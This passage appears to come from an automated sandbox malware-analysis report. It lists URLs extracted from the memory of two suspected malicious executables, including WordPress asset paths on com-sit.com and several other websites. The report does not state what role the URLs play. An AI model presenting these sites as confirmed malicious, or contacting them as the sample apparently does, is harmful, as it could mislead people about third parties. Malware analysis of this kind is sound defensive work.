                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-includes/css/classic-themes.min.css?ver=6.2.2
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-includes/css/dist/block-library/style.min.css?ver=6.2.2
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-includes/js/dist/hooks.min.js?ver=4169d3cf8e8d95a3d6d5
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-includes/js/dist/i18n.min.js?ver=9e794f35a71bb98672ae
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.13.11
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-includes/js/dist/vendor/wp-polyfill-inert.min.js?ver=3.1.2
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.0
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.4
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-includes/js/jquery/ui/core.min.js?ver=1.13.2
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630598379.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582895491.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.692459376.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.740467917.0000000004510000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.743126802.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.709156388.0000000003C60000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.578044934.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639571084.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.592194807.0000000003850000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-includes/wlwmanifest.xml
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.00000000014D9000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.651017417.000000000770A000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641101813.000000000770A000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.543963268.000000000770A000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.650670746.000000000770A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.crcsi.org/
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.00000000014D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.crcsi.org//:
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.543963268.000000000770A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.crcsi.org//F#M
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.543963268.000000000770A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.crcsi.org//I#T
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.00000000014D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.crcsi.org//kA
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.00000000014D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.crcsi.org/NA
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.00000000014D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.crcsi.org/RA
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.543963268.000000000770A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.crcsi.org/q#
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.543963268.000000000770A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.crcsi.org/x#
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.739131542.00000000076E1000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000155D000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.650670746.00000000076DD000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.738728504.0000000001556000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.651017417.00000000076DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.credo.edu.pl/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.655707909.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654487733.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.658065148.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654682646.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.533361544.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.661972820.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.655030200.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.662540486.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.crrcgc.cc/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.738728504.00000000015BB000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.814465034.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.532725762.00000000015C8000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000158C000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.543802366.00000000015BA000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641268349.00000000015BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dayvo.com/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.532725762.00000000015C8000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.543802366.00000000015BA000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641268349.00000000015BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dayvo.com/-
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.738728504.00000000015BB000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.814465034.00000000015BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dayvo.com/H
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000158C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dayvo.com/Y
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.532725762.00000000015C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dayvo.com/e
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000152E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.depalo.com/
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000152E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.depalo.com/:
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.543802366.000000000155D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.depalo.com/R
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.543802366.000000000155D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.depalo.com/U
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000155D000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.543802366.000000000155D000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.738728504.0000000001556000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dgmna.com/
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.00000000014D9000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dgmna.com/.0
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dgmna.com/.0(
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.543802366.000000000155D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dgmna.com/9
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dgmna.com/rsaenh.dll
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000155D000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.738728504.0000000001556000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000152E000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.domon.com/
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000152E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.domon.com/=
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000155D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.domon.com/c
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.738728504.00000000015BB000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.814465034.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.532725762.00000000015C8000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.738728504.000000000158C000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.543802366.00000000015BA000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641268349.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000152E000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.650619555.00000000015BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.edimart.hu/
